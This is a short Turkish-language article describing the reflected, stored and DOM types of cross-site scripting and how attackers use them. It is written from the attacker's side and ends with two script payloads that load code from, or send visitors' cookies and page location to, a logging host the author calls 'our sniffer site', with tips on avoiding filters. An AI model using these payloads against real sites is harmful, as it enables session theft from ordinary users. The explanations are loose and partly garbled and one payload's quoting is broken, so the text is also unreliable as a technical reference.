Xss Acigi Turleri ve Saldiri sekilleri

Xss açığı Türleri ve Saldırı Şekilleri

Reflected XSS : Zafiyet bulunan web sitelerinde java script kodlarının çalışması, zafiyeti bulan kişi tarafından kodlar görülebilir. Web site ziyaretçileri bu açığı asla göremez. Önemli olan bunu nasıl atack haline getirileceği sosyal mühendislik kavramı kullanılarak zafiyet kullanılmaktadır, Örneğin e-mail kullanılarak veya sosyal medya üzerinden saldıran sizin cookie bilgilerini çekebilir..

Stored Xss : En tehlikeli saldırı tipleri arasında yerini aldığını söylemek gerekiyor ilk bölümde bahsettiğimiz Reflected xss zafiyetinden daha tehlikeli olduğunu bilmeniz gerekiyor. Zararlı kodlar ile kullanıcılar ciddi şekilde etkilenmektedir bu saldırganın kod bilgisine göre değişiklik gösterecektir.

DOM Xss : Firmaları en çok etkileyen xss zafiyeti,kesinlikle zararlı kodların kullanıldığını unutmayınız, Dom xss ile sitenin index kısmı değişmektedir. trojan dowlander  vb bir çok tehlikeli kod siteye eklene bilir yönlendirme yapılarak kullanıcılar yanıltılabilir.

XSS Saldırı Şekilleri 

Cookie Çalma! : Cookie bilgileri şifremi hatırla kısmının saldırganın çalması işlemidir diyebilir.

<script src=http://sniffersitemiz.com/a></script> yerine
<script>i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?'%2bdocument.cookie%2b'  '+document.location</script>

Bu alanda özel karakter kullanmamayı genelde tercih etmelisiniz.

Eğer kodları iyi analiz eden bir hacker varsa karşınızda muhtemelen size bunu hex şeklinde gönderecektir.